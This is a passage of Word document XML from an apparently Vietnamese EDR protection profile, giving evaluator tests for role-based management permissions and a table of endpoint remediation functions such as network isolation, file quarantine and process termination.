          </w:tcPr>
          <w:p w14:paraId="3F2EF0EC" w14:textId="7206347B" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7942" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06DD6AE0" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:spacing w:val="-4"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hoạt động để xác định TSS chứa các hướng dẫn để quản lý EDR, vai trò người dùng nào được hỗ trợ và quyền nào mà mỗi vai trò có.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="7EE57951" w14:textId="77777777" w:rsidTr="00C42841">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E9997B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7942" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44B1E278" w14:textId="191B9B90" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải xác minh rằng vai trò của quản trị viên</w:t>
            </w:r>
            <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">hoặc, </w:t>
            </w:r>
            <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>chuyên gia phân tích</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> SOC và người đọc có sẵn, tạo các tài khoản riêng lẻ với mỗi vai trò được chỉ định.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7749E6D0" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải xác minh rằng vai trò không phải là quản trị viên không thể sửa đổi vai trò của tài khoản của chính họ hoặc của người khác.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6928B5DE" w14:textId="6B90194F" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 3:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Trong quá trình thực hiện các hoạt động thử nghiệm để đánh giá, Đánh giá viên phải sử dụng tất cả các giao diện được hỗ trợ, mặc dù không cần thiết phải lặp lại mỗi thử nghiệm liên quan đến một hành động quản trị với mỗi giao diện. Tuy nhiên, Đánh giá viên phải đảm bảo rằng mỗi phương pháp được hỗ trợ để quản lý EDR phù hợp với các yêu cầu của </w:t>
            </w:r>
            <w:r w:rsidR="00475C38" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Hồ sơ bảo vệ</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> này đều được thử nghiệm; ví dụ: nếu EDR có thể được quản lý thông qua giao diện phần cứng cục bộ hoặc TLS / HTTPS thì cả hai phương pháp quản lý phải được thực hiện trong quá trình thực hiện các hoạt động thử nghiệm.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D5ECAC" w14:textId="73B0804F" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 4:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải thử từng chức năng với từng vai trò và xác minh quyền truy cập phù hợp với </w:t>
            </w:r>
            <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>khung</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> yêu cầu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="446C1BC6" w14:textId="31BE78D2" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9.3.3.</w:t>
      </w:r>
      <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> FMT_SRF_EXT.1 Đặc điểm kỹ thuật của các chức năng khắc phục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027264CF" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FMT_SRF_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7991FF8F" w14:textId="527654D4" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Arial" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>EDR có khả năng thực hiện các chức năng khắc phục sau đây:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="250" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5103"/>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="1418"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="1A5998AE" w14:textId="77777777" w:rsidTr="005D3441">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71061127" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chức năng quản lý</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10CCEDD9" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Quản trị</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20CD47DE" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chuyên gia phân tích SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E4AE5AA" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Người đọc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="26D8A899" w14:textId="77777777" w:rsidTr="005D3441">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A4310AB" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>Cách ly một điểm cuối bằng cách [</w:t>
            </w:r>
            <w:r w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>lựa chọn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>cách ly một cách hợp lý điểm cuối khỏi mạng trừ khi được liệt kê cho phép, cách ly tệp độc hại trên điểm cuối</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>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E35891" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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1C9BAF9" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>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16A584" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="7CE0FCB6" w14:textId="77777777" w:rsidTr="005D3441">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C8C1C8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1005"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>Chấm dứt quá trình đang chạy trên một điểm cuối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BF0B72" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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C26DC93" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>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E8A3CE" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="33B45DE3" w14:textId="77777777" w:rsidTr="005D3441">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E4BBB04" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1005"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>Truy xuất các tệp có khả năng bị ảnh hưởng hoặc trái phép từ một điểm cuối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526DAF" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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7469542" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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D8F825" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29829B04" w14:textId="4C6B96FD" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:ind w:right="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chú giải bảng: M = Bắt buộc, O = Tùy chọn, - = </w:t>
      </w:r>
      <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Không xác định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281C238" w14:textId="54ABF38F" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yêu cầu này ghi lại tất cả các chức năng khắc phụ</w:t>
      </w:r>
      <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">mà EDR cung cấp cho </w:t>
      </w:r>
      <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chuyên gia phân tích</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOC và tùy chọn Quản trị viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1704A90D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cách ly hợp lý khỏi mạng đề cập đến việc hạn chế giao tiếp từ điểm cuối đến phần còn lại của mạng, có thể bao gồm một danh sách cho phép bị hạn chế.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703"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="1BBFA589" w14:textId="77777777" w:rsidTr="00B75CA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1379" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37054EDD" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61AF438F" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Hoạt động đảm bảo</w:t>
            </w:r>
